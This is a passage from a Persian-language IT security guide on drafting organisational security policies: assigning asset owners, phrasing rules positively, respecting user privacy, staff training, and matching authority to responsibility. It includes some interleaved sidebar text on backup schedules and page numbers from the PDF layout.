‫ﻣﻲ ﺷﻮﻧﺪ؛ ﻭ ﻧﺴﺒﺖ ﺑﻪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺩﺭ ﺑﺎﺯﻩﻫﺎﻱ ﻛﻮﺗﺎﻫﺘﺮﻱ ﺗﻐﻴﻴﺮ‬
‫ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺷﺮﺍﻳﻂ ﻣﺘﻐﻴﺮ ﺭﺍ ﺑـﺼﻮﺭﺕ ﺻـﺤﻴﺢ ﻣـﻨﻌﻜﺲ‬
‫ﻛﻨﻨﺪ‪.‬‬
‫ﻧﻜﺎﺕ ﻛﻠﻴﺪﻱ ﺩﺭ ﺗﺪﻭﻳﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﻛﺎﺭﺁ‬
‫ﻧﻘـﺶ ﺳﻴﺎﺳــﺖ )ﻭ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﻭ ﺭﺍﻫﺒﺮﺩﻫــﺎﻱ ﻣﺮﺑﻮﻃــﻪ( ﻛﻤــﻚ ﺑــﻪ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺖ ﻛﻪ ﺭﻭﻳﻬﻤﺮﻓﺘﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻣﻬﻢ ﺗﻠﻘـﻲ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﻟﺰﻭﻣﻲ ﻧﺪﺍﺭﺩ ﺳﻴﺎﺳﺘﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‬
‫ﻭﻳﮋﻩ ﻭ ﭘﻴﭽﻴﺪﻩ ﺑﺎﺷﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻳﻚ ﻗﺎﻧﻮﻥ ﺳﺎﺩﻩ ﺑﺮﺍﻱ ﺗﻤـﺎﻡ‬
‫ﺳﻴﺎﺳﺖ ﻣﺤﻴﻂ ﺷﻤﺎ ﻛﺎﻓﻲ ﺍﺳﺖ‪ ،‬ﻣﺎﻧﻨﺪ ﻣﺜﺎﻝ ﺯﻳﺮ‪:‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻭ ﺣﻔﺎﻇﺖ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﻭﻇﻴﻔﺔ ﻫﻤـﻪ ﻣـﻲﺑﺎﺷـﺪ‪.‬‬
‫‪Level 0 dump‬‬
‫‪81‬‬
‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻻﺯﻡ ﺍﺳﺖ ﻳﻚ ﺳﻴﺎﺳﺖ ﺭﺳﻤﻲﺗﺮ ﻛـﻪ ﺗﻮﺳـﻂ‬
‫ﻳﻚ ﻣﺘﺨﺼﺺ ﺭﺳﻤﻲ ﻭ ﭼﻨﺪ ﻣﺸﺎﻭﺭ ﺍﻣﻨﻴﺘـﻲ ﺑـﺎﺯﺑﻴﻨﻲ ﺷـﺪﻩ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺭﺍﺋﻴﻬﺎﻳﺘﺎﻥ ﺑﻜﺎﺭ ﺑﺮﻳﺪ‪ .‬ﺳﻴﺎﺳﺖ ﻫﺮ ﺳﺎﺯﻣﺎﻥ ﺑـﺎ‬
‫ﺳﺎﺯﻣﺎﻥ ﺩﻳﮕﺮ ﺗﻔﺎﻭﺕ ﺩﺍﺭﺩ؛ ﭼﺮﺍﻛﻪ ﻫﻤـﻮﺍﺭﻩ ﺑـﺮﺍﻱ ﻫـﺮ ﺳـﺎﺯﻣﺎﻥ‬
‫ﻣﻼﺣﻈﺎﺕ ﺧﺎﺻﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﻻﺯﻡ ﺍﺳـﺖ ﺑﻄـﻮﺭ ﻣﺠـﺰﺍ ﺩﺭ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺗﺪﻭﻳﻦﺷﺪﻩ ﻣﻮﺭﺩ ﺍﺷﺎﺭﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ‪.‬‬
‫ﺗﺨﺼﻴﺺ ﻳﻚ ﻣﺴﺌﻮﻝ‬
‫ﻫﺮ ﺟﺰﺀ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﺠﻬﻴﺰﺍﺕ ﻛﻪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ‬
‫ﮔﻴﺮﺩ ﺑﺎﻳﺪ ﻳﻚ ﻣﺴﺌﻮﻝ ﻣﻌﻴﻦ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪" .‬ﻣﺴﺌﻮﻝ" ﻛﺴﻲ ﺍﺳﺖ‬
‫ﻛﻪ ﺩﺭ ﻗﺒﺎﻝ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ‪ ،‬ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ‪ ،‬ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ ﻭ ﺳﺎﻳﺮ‬
‫ﺟﻨﺒﻪﻫﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﻣـﺴﺌﻮﻟﻴﺖ ﺩﺍﺭﺩ‪ .‬ﺍﻭ ﻫﻤﭽﻨـﻴﻦ‬
‫ﻳﻜﻲ ﺍﺯ ﻛﺴﺎﻧﻲ ﺍﺳﺖ ﻛﻪ ﻣﺠﺎﺯ ﺍﺳـﺖ ﺑـﻪ ﺍﻃﻼﻋـﺎﺕ ﺩﺳﺘﺮﺳـﻲ‬
‫ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻣﺸﻜﻞ ﺍﻣﻨﻴﺖ ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﻬﻤــﻲ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ ﻛــﻪ ﻣــﺴﺌﻮﻝ ﻣﺸﺨــﺼﻲ ﻧــﺪﺍﺭﺩ‪ .‬ﺩﺭﻧﺘﻴﺠــﻪ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻧﻤﻲﺩﺍﻧﻨﺪ ﭼﻪ ﻛـﺴﻲ ﺩﺭﺑـﺎﺭﺓ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴﺮﺩ ﻳﺎ ﭼﻪ ﻛﺴﻲ ﺿﻮﺍﺑﻂ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ‬
‫ﺗﺪﻭﻳﻦ ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺑﻌﻀﻲ ﺍﻭﻗﺎﺕ ﺍﻃﻼﻋﺎﺕ )ﻭ ﻫﻤﭽﻨـﻴﻦ ﺗﺠﻬﻴـﺰﺍﺕ(‬
‫ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﻛﺴﻲ ﻣﺘﻮﺟﻪ ﺷـﻮﺩ ﺑـﺮﺍﻱ ﻣـﺪﺗﻲ ﻃـﻮﻻﻧﻲ ﻧﺎﭘﺪﻳـﺪ‬
‫ﻣﻲﺷﻮﻧﺪ؛ ﭼﺮﺍﻛﻪ ﻛﺴﻲ ﻣﺴﺌﻮﻝ ﺁﻧﻬﺎ ﻧﻴﺴﺖ ﻛﻪ ﺷﺮﺍﻳﻂ ﺭﺍ ﻛﻨﺘﺮﻝ‬
‫ﻛﻨﺪ‪.‬‬
‫ﻣﺜﺒﺖ ﺑﺎﺷﻴﺪ‬
‫ﺍﻓﺮﺍﺩ ﺑﻪ ﺟﻤـﻼﺕ ﻣﺜﺒـﺖ ﻭ ﺍﺛﺒـﺎﺗﻲ ﺑﻬﺘـﺮ ﺍﺯ ﺟﻤـﻼﺕ ﻣﻨﻔـﻲ ﻭ‬
‫ﻋﺒﺎﺭﺍﺕ ﻧﻔـﻲﻛﻨﻨـﺪﻩ ﻭﺍﻛـﻨﺶ ﻧـﺸﺎﻥ ﻣـﻲﺩﻫﻨـﺪ‪ .‬ﺑﺠـﺎﻱ ﺗﻬﻴـﻪ‬
‫ﻟﻴﺴﺘﻬﺎﻱ ﻃﻮﻳﻞ ﺍﺯ ﻋﺒﺎﺭﺗﻬﺎﻱ "ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﻧﺪﻫﻴﺪ"‪ ،‬ﺑﺒﻴﻨﻴﺪ ﻛﻪ‬
‫ﭼﮕﻮﻧﻪ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻫﻤﺎﻥ ﺿﻮﺍﺑﻂ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺜﺒـﺖ ﺟﻤﻠـﻪﺑﻨـﺪﻱ‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺳﻴﺎﺳﺖ ﺧﻼﺻﺔ ﻗﺒﻠﻲ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﺼﻮﺭﺕ ﻣﺠﻤﻮﻋـﻪﺍﻱ‬
‫ﺍﺯ "ﻧﺒﺎﻳﺪﻫـﺎ" ﻣﻄـﺎﺑﻖ ﺯﻳـﺮ ﺗﻬﻴـﻪ ﻛـﺮﺩ؛ ﺍﻣـﺎ ﺑﺒﻴﻨﻴـﺪ ﻛـﻪ ﻫﻤـﺎﻥ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫ﺩﺭ ﺍﻭﻝ ﻭ ﭘﺎﻧﺰﺩﻫﻢ ﻫﺮ ﻣﺎﻩ ﺻﻮﺭﺕ ﺑﮕﻴﺮﺩ‪ .‬ﭘـﺸﺘﻴﺒﺎﻥ ﮔﻴـﺮﻱ‬
‫ﺳﻄﺢ ‪ ۵‬ﺑﺎﻳﺪ ﺷﺒﻬﺎﻱ ﻫﺮ ﺩﻭﺷﻨﺒﻪ ﻭ ﭘﻨﺞﺷﻨﺒﻪ ﺍﻧﺠـﺎﻡ ﺷـﻮﺩ‪،‬‬
‫ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﭘﺸﺘﻴﺎﻥ ﺳﻄﺢ ﺻﻔﺮ ﻳﺎ ‪ ۳‬ﺩﺭ ﻫﻤﺎﻧﺮﻭﺯ ﺍﻧﺠﺎﻡ ﺷﺪﻩ‬
‫ﺑﺎﺷﺪ‪ .‬ﭘﺸﺘﻴﺒﺎﻥ ﺳﻄﺢ ‪ ۷‬ﺑﺎﻳﺪ ﻳﻚ ﺷﺐ ﺩﺭ ﻣﻴﺎﻥ ﺗﻬﻴﻪ ﺷﻮﺩ‪،‬‬
‫ﻣﮕﺮ ﺩﺭ ﺍﻳﺎﻡ ﺗﻌﻄﻴﻼﺕ‪.‬‬
‫ﺗﻨﻬﺎ ﻛﺎﺭﻫﺎﻳﻲ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ ﻛﻪ ﻣﺎﻳﻠﻴﺪ ﺩﻳﮕﺮﺍﻥ ﻫﻢ ﺁﻧﺮﺍ ﺍﻧﺠﺎﻡ‬
‫ﺩﻫﻨﺪ‪ .‬ﺑﻪ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﺍﺣﺘـﺮﺍﻡ ﺑﮕﺬﺍﺭﻳـﺪ‪.‬‬
‫ﭼﻨﺎﻧﭽﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﺷﺪﻳﺪ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﺮﺍ ﻳﺎ ﺧﻮﺩﺗـﺎﻥ‬
‫ﺭﻓﻊ ﻛﻨﻴﺪ ﻭ ﻳﺎ ﺳﺮﻳﻌﹰﺎ ﮔﺰﺍﺭﺵ ﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﻪ ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ ﺑـﻪ‬
‫ﻛﺎﺭﺑﺮﺩ ﺳﻴﺴﺘﻢ ﺍﺣﺘﺮﺍﻡ ﺑﮕﺬﺍﺭﻳﺪ‪ .‬ﻣﺴﺌﻮﻟﻴﺖ ﻛﺎﺭﻫﺎﻱ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﭙﺬﻳﺮﻳﺪ ﻭ ﻫﻤﻴﺸﻪ ﺧﻮﺩ ﺭﺍ ﻣﻌﺮﻓـﻲ ﻛﻨﻴـﺪ‪ .‬ﺍﺯ ﻛﺎﺭﺗـﺎﻥ ﻟـﺬﺕ‬
‫ﺑﺒﺮﻳﺪ‪.‬‬
‫‪١٥٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻋﺒﺎﺭﺗﻬﺎﻱ ﻗﺒﻠﻲ ﭼﻘﺪﺭ ﺭﺍﺣﺖﺗﺮ ﺧﻮﺍﻧﺪﻩ ﻣﻲﺷﺪﻧﺪ‪:‬‬
‫ﺍﻳﻦ ﻭﻇﻴﻔﺔ ﺷﻤﺎﺳﺖ ﻛﻪ ﺍﺟﺎﺯﻩ ﻧﺪﻫﻴـﺪ ﺍﺯ ﺳﻴـﺴﺘﻢ ﺍﺳـﺘﻔﺎﺩﺓ‬
‫ﻧﺎﺩﺭﺳﺖ ﺑﺸﻮﺩ‪ .‬ﻛﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺩﻭﺳﺖ ﻧﺪﺍﺭﻳﺪ ﺩﻳﮕﺮﺍﻥ ﺍﻧﺠـﺎﻡ‬
‫ﺩﻫﻨــﺪ ﺭﺍ ﺍﻧﺠــﺎﻡ ﻧﺪﻫﻴــﺪ‪ .‬ﺣــﺮﻳﻢ ﺧــﺼﻮﺻﻲ ﺩﻳﮕــﺮﺍﻥ ﺭﺍ‬
‫ﺧﺪﺷﻪﺩﺍﺭ ﻧﻜﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻣﺸﻜﻠﻲ ﭘﻴﺪﺍ ﻛﺮﺩﻳﺪ ﻭ ﻧﺘﻮﺍﻧـﺴﺘﻴﺪ ﺁﻧـﺮﺍ‬
‫ﺑﺮﻃﺮﻑ ﻛﻨﻴﺪ‪ ،‬ﻣﺸﻜﻞ ﺭﺍ ﻣﺨﻔﻲ ﻧﮕﻪ ﻧﺪﺍﺭﻳﺪ‪ .‬ﻗﻮﺍﻧﻴﻦ ﻣﺮﺑﻮﻁ‬
‫ﺑــﻪ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴــﺴﺘﻢ ﺭﺍ ﻧﻘــﺾ ﻧﻨﻤﺎﻳﻴــﺪ‪ .‬ﺳــﻌﻲ ﻧﻜﻨﻴــﺪ‬
‫ﻣﺴﺌﻮﻟﻴﺖ ﻛﺎﺭﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﮔـﺮﺩﻥ ﺩﻳﮕـﺮﺍﻥ ﺑﻴﻨﺪﺍﺯﻳـﺪ؛ ﻭ‬
‫ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﭘﻨﻬﺎﻥ ﻧﻨﻤﺎﻳﻴﺪ‪ .‬ﺍﻣﻴـﺪﻭﺍﺭﻳﻢ ﺍﻭﻗـﺎﺕ ﺑـﺪﻱ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ!‬
‫ﻭﻗﺘﻲ ﺳﻴﺎﺳﺘﻬﺎ ﺭﺍ ﻣﻲﻧﻮﻳﺴﻴﺪ‪ ،‬ﻫﻤﻮﺍﺭﻩ ﺭﻓﺘﺎﺭ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﺩﺭ ﺫﻫـﻦ‬
‫ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺁﻧﻬﺎ ﺩﭼﺎﺭ ﺍﺷﺘﺒﺎﻩ ﻣﻲﺷﻮﻧﺪ ﻭ ﺍﺯ ﻧﻜﺎﺕ‪ ،‬ﺗﻌﺒﻴـ ﹺﺮ‬
‫ﻧﺎﺩﺭﺳﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺳﻴﺎﺳﺖ ﺷﻤﺎ ﻧﺒﺎﻳﺪ ﻃﻮﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺩﺭﺻﻮﺭﺕ‬
‫ﺍﺷﺘﺒﺎﻩ ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﺁﻧﺎﻥ ﺭﺍ ﻣﺴﺘﺤﻖ ﻫﺮ ﻣﺠﺎﺯﺍﺗﻲ ﺑﺪﺍﻧﺪ‪.‬‬
‫ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻣﻤﻜـﻦ‬
‫ﺍﺳﺖ ﺷـﺎﻣﻞ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﺩﺭ ﻣـﻮﺭﺩ ﻛـﺎﺭﺑﺮﺍﻥ ﺑﺎﺷـﻨﺪ ﻭ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺑﺨﻮﺍﻫﻨﺪ ﺗﺎ ﺣﺪﻭﺩﻱ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺧﺼﻮﺻﻲ ﻧﮕﻬﺪﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺍﻃﻼﻋﺎﺕ ﺧﺼﻮﺻﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺷـﺎﻣﻞ ﻧﺎﻣـﻪﻫـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﺳﻮﺍﺑﻖ ﺷﺨﺼﻲ ﻭ ﺍﺭﺯﺷﻴﺎﺑﻴﻬﺎﻱ ﺷﻐﻠﻲ ﺑﺎﺷﺪ‪ .‬ﭘﺲ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ‬
‫ﻧﻴﺰ ﺑﺎﻳﺪ ﻣـﻮﺭﺩ ﻣﺤﺎﻓﻈـﺖ ﻗـﺮﺍﺭ ﮔﻴﺮﻧـﺪ؛ ﻫﺮﭼﻨـﺪ ﺷـﺎﻳﺪ ﻧﺘﻮﺍﻧﻴـﺪ‬
‫ﺧﺼﻮﺻﻲ ﻣﺎﻧﺪﻥ ﺁﻧﻬﺎ ﺭﺍ ﺗﻀﻤﻴﻦ ﻛﻨﻴﺪ‪ .‬ﺧﻼﺻﺔ ﻣﻄﻠﺐ ﺍﻳﻨﻜـﻪ ﺍﺯ‬
‫ﻧﻴﺎﺯﻫﺎ ﻭ ﺍﺣﺴﺎﺳﺎﺕ ﻛﺎﺭﺑﺮﺍﻥ ﻏﺎﻓﻞ ﻧﺸﻮﻳﺪ‪.‬‬
‫ﺑﺮ ﺁﻣﻮﺯﺵ ﻭ ﺁﮔﺎﻫﻲ ﺗﻤﺮﻛﺰ ﻛﻨﻴﺪ‬
‫ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﺁﻣـﻮﺯﺵ ﻭ ﺑـﺎﺯﺁﻣﻮﺯﻱ ﻛﻠﻴـﺔ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﺩﻫﻴﺪ‪ .‬ﻫﺮ ﻛـﺎﺭﺑﺮ ﺑﺎﻳـﺪ ﺁﮔـﺎﻫﻲ ﺍﻭﻟﻴـﻪﺍﻱ ﺩﺭ ﻣـﻮﺭﺩ‬
‫ﺍﻣﻨﻴﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺁﻥ ﻣﻄﺎﻟﺐ ﺑﺎﻳﺪ ﺩﺭ ﻳـﻚ ﺑﺮﻧﺎﻣـﻪ ﻭ‬
‫ﻗﺎﻟﺐ ﻣﺸﺨﺺ ﺑﺮﺍﻱ ﻭﻱ ﻳﺎﺩﺁﻭﺭﻱ ﺷﻮﻧﺪ )ﺣﺘﻲ ﺍﮔﺮ ﺑﺮﻧﺎﻣﺔ ﻳـﺎﺩﺁﻭﺭﻱ‬
‫ﺗﻨﻬﺎ ﺷﺎﻣﻞ ﺍﺭﺍﺋﻪ ﻧﺴﺨﻪﺍﻱ ﺍﺯ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺑـﻪ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺎﺷـﺪ!(‪ .‬ﺍﺣﺘﻤـﺎﻝ‬
‫ﮔﺮﻓﺘﺎﺭﺷــﺪﻥ ﻛــﺎﺭﺑﺮﺍﻥ ﺁﻣــﻮﺯﺵﺩﻳــﺪﻩ ﺩﺭ ﺗﺮﻓﻨــﺪﻫﺎ ﻭ ﺧــﺼﻮﺻﹰﺎ‬
‫ﺣﻤﻼﺕ ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ ﻛﻤﺘﺮ ﺍﺳﺖ‪ .‬ﻫﻤﭽﻨﻴﻦ ﺍﮔﺮ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﺑﺪﺍﻧﻨﺪ ﻛﻪ ﻫﺮﻳﻚ ﺍﺯ ﻣﻌﻴﺎﺭﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﭼﺮﺍ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﮔﺮﻓﺘﻪﺍﻧﺪ‪ ،‬ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ﻛﻪ‬
‫ﺍﺯ ﺁﻧﻬﺎ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﻛﻨﻨﺪ ﻭ ﻫﺮﻳﻚ ﺭﺍ ﺑﺪﺭﺳﺘﻲ ﺍﺟﺮﺍ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﻳﻚ ﺑﺨﺶ ﺣﻴﺎﺗﻲ ﻫﺮ ﺳﻴﺴﺘ ﹺﻢ ﺍﻣﻨﻴﺖ‪ ،‬ﺍﻋﻄﺎﻱ ﺯﻣـﺎﻥ ﻭ ﻓـﺮﺍﻫﻢ‬
‫ﻛﺮﺩﻥ ﭘﺸﺘﻴﺎﻧﻲ ﺑﺮﺍﻱ ﺗﺤﺼﻴﻞ ﻭ ﺁﻣﻮﺯﺵ ﺑﻴﺸﺘﺮ ﻛﺎﺭﻛﻨﺎﻥ ﺍﺳـﺖ‪.‬‬
‫ﻫﻤــﻮﺍﺭﻩ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻧــﻮ‪ ،‬ﺗﻬﺪﻳــﺪﺍﺕ ﺟﺪﻳــﺪ‪ ،‬ﺭﻭﺷــﻬﺎﻱ ﻧــﻮﻳﻦ‪ ،‬ﻭ‬
‫ﺍﻃﻼﻋــﺎﺕ ﺗــﺎﺯﻩ ﺑــﺮﺍﻱ ﻳــﺎﺩﮔﻴﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﮔــﺮ ﻛﺎﺭﻣﻨــﺪﺍﻥ‬
‫ﻫﻔﺘﻪﺍﻱ ‪ ۶۰‬ﺳﺎﻋﺖ ﺻﺮﻑ ﻳﺎﻓﺘﻦ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻴﺎﻟﻲ ﺭﺍﻳﺎﻧﻪﻫـﺎﻱ‬
‫ﺷﺨﺼﻲ ﻭ ﺗﻬﻴﺔ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﻛﻨﻨـﺪ‪ ،‬ﺑـﺎﺯﻫﻢ ﺑـﻪ ﺍﻧـﺪﺍﺯﺓ‬
‫ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺳﺎﻻﻧﻪ ﺗﻨﻬﺎ ﺑﻪ ﻣﺪﺕ ﭼﻨﺪ ﻫﻔﺘـﻪ ﺗﺤـﺖ ﺁﻣـﻮﺯﺵ‬
‫ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻛﺎﺭﺁﻳﻲ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﺯ ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﺍﮔﺮ ﺑﻪ ﺁﻧﻬﺎ ﻓﺮﺻﺖ‬
‫ﺗﺮﻗﻲ ﻭ ﻳﺎﺩﮔﻴﺮﻱ ﺩﺭ ﻃﻮﻝ ﻣﺪﺕ ﻛﺎﺭ ﺩﺍﺩﻩ ﺷﻮﺩ ﻭ ﺍﺟـﺎﺯﻩ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ ﺑﺠﺎﻱ ﻧﺼﺐ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻭ ﭘﺸﺘﻴﺒﺎﻥﮔﻴﺮﻱ‪ ،‬ﻋﺼﺮ ﻫﺮ ﺭﻭﺯ ﻭ‬
‫ﺗﻌﻄﻴﻼﺕ ﺁﺧﺮ ﻫﻔﺘـﻪ ﺭﺍ ﺑـﺎ ﺧـﺎﻧﻮﺍﺩﻩﻫﺎﻳـﺸﺎﻥ ﺳـﭙﺮﻱ ﻛﻨﻨـﺪ‪ ،‬ﺍﺯ‬
‫ﻛﺎﺭﻫﺎﻳﺸﺎﻥ ﺧﺮﺳﻨﺪﺗﺮ ﻭ ﺭﺍﺿﻲﺗﺮ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬
‫ﺍﺧﺘﻴﺎﺭﺍﺕ ﺭﺍ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺗﻮﺯﻳﻊ ﻛﻨﻴـﺪ‪ .‬ﻳـﻚ ﺍﺻـﻞ ﺩﺭ‬
‫ﺭﺍﻫﺒﺮﻱ ﺍﻣﻨﻴﺖ ﻣﻲﮔﻮﻳﺪ‪:‬‬
‫ﺍﮔﺮ ﻣﺴﺌﻮﻟﻴﺘﻲ ﺩﺭ ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻣﻨﻴﺖ ﺩﺍﺭﻳـﺪ ﻭﻟـﻲ ﺍﺧﺘﻴـﺎﺭﻱ ﺑـﺮﺍﻱ‬
‫ﻗﺎﻧﻮﻧﮕﺬﺍﺭﻱ ﻭ ﺗﻨﺒﻴﻪ ﻣﺘﺨﻠﻔﻴﻦ ﺑﻪ ﺷﻤﺎ ﺩﺍﺩﻩ ﻧﺸﺪﻩ ﺍﺳﺖ‪ ،‬ﻫﻨﮕـﺎﻡ‬
‫ﻭﻗﻮﻉ ﻳـﻚ ﻣـﺸﻜﻞ ﺑـﺰﺭﮒ ﺍﻳـﻦ ﺷـﻤﺎ ﻫـﺴﺘﻴﺪ ﻛـﻪ ﺳـﺮﺯﻧﺶ‬
‫ﻣﻲﺷﻮﻳﺪ‪.‬‬
‫ﻫﺮ ﭼﻨﺪ ﺍﺻﻞ ﺑﺎﻻ ﺩﺭ ﺑﻴﺸﺘﺮ ﻣﻮﺍﺭﺩ ﺑﺮﻗﺮﺍﺭ ﺍﺳﺖ‪ ،‬ﺍﻣـﺎ ﻣـﺴﺌﻮﻟﻴﺖ‬
‫ﻭﺍﻗﻌﻲ ﻣﺘﻮﺟﻪ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﺍﺧﺘﻴﺎﺭﺍﺕ ﺭﺍ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ‬
‫ﺗﻮﺯﻳﻊ ﻧﻜﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺍﻳﻦ ﺑﺨﺶ ﺷﺎﻣﻞ ﻓﻬﺮﺳﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﻣﺪﻳﺮﺍﻥ ﻭ ﻛﺎﺭﻛﻨﺎﻧﻲ ﺍﺳـﺖ‬
‫ﻛﻪ ﻣﺴﺌﻮﻟﻴﺖ ﺍﻣﻨﻴﺖ ﺑﺎ ﺁﻧﻬﺎ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺑﻪ ﻋﻮﺍﻣﻞ ﻣﻬﻢ‬
